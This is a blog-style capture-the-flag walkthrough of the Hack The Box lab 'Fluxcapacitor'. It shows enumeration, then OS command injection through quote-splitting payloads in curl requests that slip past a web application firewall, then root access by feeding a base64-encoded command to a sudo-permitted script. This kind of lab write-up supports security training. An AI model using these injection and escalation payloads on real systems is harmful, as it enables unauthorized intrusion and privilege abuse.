Hack the Box Challenge: Fluxcapacitor Walkthrough

at 11:19 PM Thursday, May 17, 2018

Hello friends!! Today we are sharing our experience that can be helpful in solving new CTF challenge: Fluxcapacitor of Hack The Box. Solving this lab is not much easy, all you need is your web penetration testing skill to solve this challenge. This lab is designed to bypass Web Application Firewall (WAF) for exploiting OS command injection vulnerability in this machine.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.

Let’s Begin!!

These labs are only available online, therefore, they have a static IP. Fluxcapacitor has IP: 10.10.10.69.
As we knew the initial stage is enumeration; therefore use nmap version scan for gathering target’s machine and running services information.
nmap -sV 10.10.10.69




So from its scanning result, it told us that port 80 is open for web services and also protected by web application firewall “superWAF”  thus we explored target IP in the web browser but found nothing interesting.




Then we look into its source code and saw an exciting comment which was pointing towards URL: /sync, and without wasting time we open /sync in URL.




LOL!!! It gave 403 forbidden error message and something openresty/1.13.6.1 then we looked into Google for any exploit related to this but failed to find any working exploit against it.




At the moment, we decided to use burp suite for intercepting our browser request. So after intercepting the Http request, the raw information is sent to the repeater.




Huhhhh!! It was responding same output as was in the web browser. Might be there would be some chances of WAF filter restriction on User-Agent such as Mozilla Firefox/5.0.




So we start scrutiny for User-Agent field by replacing original user-agent content from “raj” randomly. Finally!!! It gave current timestamp as disclosed in the comment found in the source code of the home page.




Now it was confirmed that there was SuperWAF filter against the user-agent field, therefore, we try to search its exploit in Google but we didn't find any particular exploit.  Nevertheless, Google gave a little hint for OS command injection and on the bases of that, we try few parameters within Http Header such as /sync?test=ls which response with the same timestamp every time. Hence we need to fuzz proper directory, therefore, we will use wfuzz in our next step.




So we use common.txt wordlist for URL brute force and execute below command.
wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19
It gave 403 response for payload “opt”; let’s try to opt after/sync and identify the response.




Now use ‘opt’ parameter to bypass WAF and execute ls command through it, HOWEVER again there is a trick to execute ls command. Because WAF will not allow you to perform OS command injection directly, therefore, it will be a little bit tougher to exploit it. But THANKS to medium.com, because I got the idea to bypass WAF for exploiting OS command injection which is known as string literal concatenation from this website, meaning that adjacent string literals are concatenated, without any operator.




We took help from that website which I have mentioned above and execute three commands: whoami, id, uname through curl as shown in image.
curl http://10.10.10.69/sync?opt=' whoami'
curl "http://10.10.10.69/sync?opt=' id'"
curl http://10.10.10.69/sync?opt=' u'n'ame -a'

Superb!! It was great to know that we have bypassed WAF successfully, but still the task is not completed yet.



Let’s seize the user.txt and root.txt file and finished this task. Hhhhhh!!!! Believe me, still, it is not easy to bypass WAF even if your goal is near. Seriously we put great efforts and at last found user.txt when executed below commands.

curl "http://10.10.10.69/sync?opt=' l's' /home'"
curl http://10.10.10.69/sync?opt=' l's' /home/Fl'uxC'apa'cit'orI'n'c'
curl "http://10.10.10.69/sync?opt=' c'at' /home/Fl'uxC'apa'cit'orI'n'c/u'ser'.'txt''"




Now the goal was root.txt file and taking a lesson from the previous experience I choose to run sudo -l command to check the sudo privileges of the current user.
curl http://10.10.10.69/sync?opt=' sudo -l'




Awesome!! It told us that we can run a script “monit” with root privileges without using password, which is inside /home/themiddle/ directory. Let’s open it with the help of cat command.
curl http://10.10.10.69/sync?opt=' c'at' /h'ome/themiddle/.monit''
After reading .monit file, we concluded that the script takes two parameter i.e. cmd string and base64 decoding which will match the conditions according to it and passes the final result to bash -c as parameter.




Hence it was clear that 1st parameter will match string “cmd” and 2nd will decode base64 value for that reason first we generated base64 value for /root/root.txt because we were well aware of the location of the root.txt file from our previous challenges.

echo "cat /root/root.txt" | base64

Now with the help of sudo privilege execute the command to gain root access and complete the task by grabbing root.txt

curl http://10.10.10.69/sync?opt=' sudo /h'ome/themiddle/.monit' cmd Y2F0IC9yb290L3Jvb3QudHh0Cg=='

HURRAYYYY!!! We hit the goal and successfully found the root.txt file.


Labels:

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)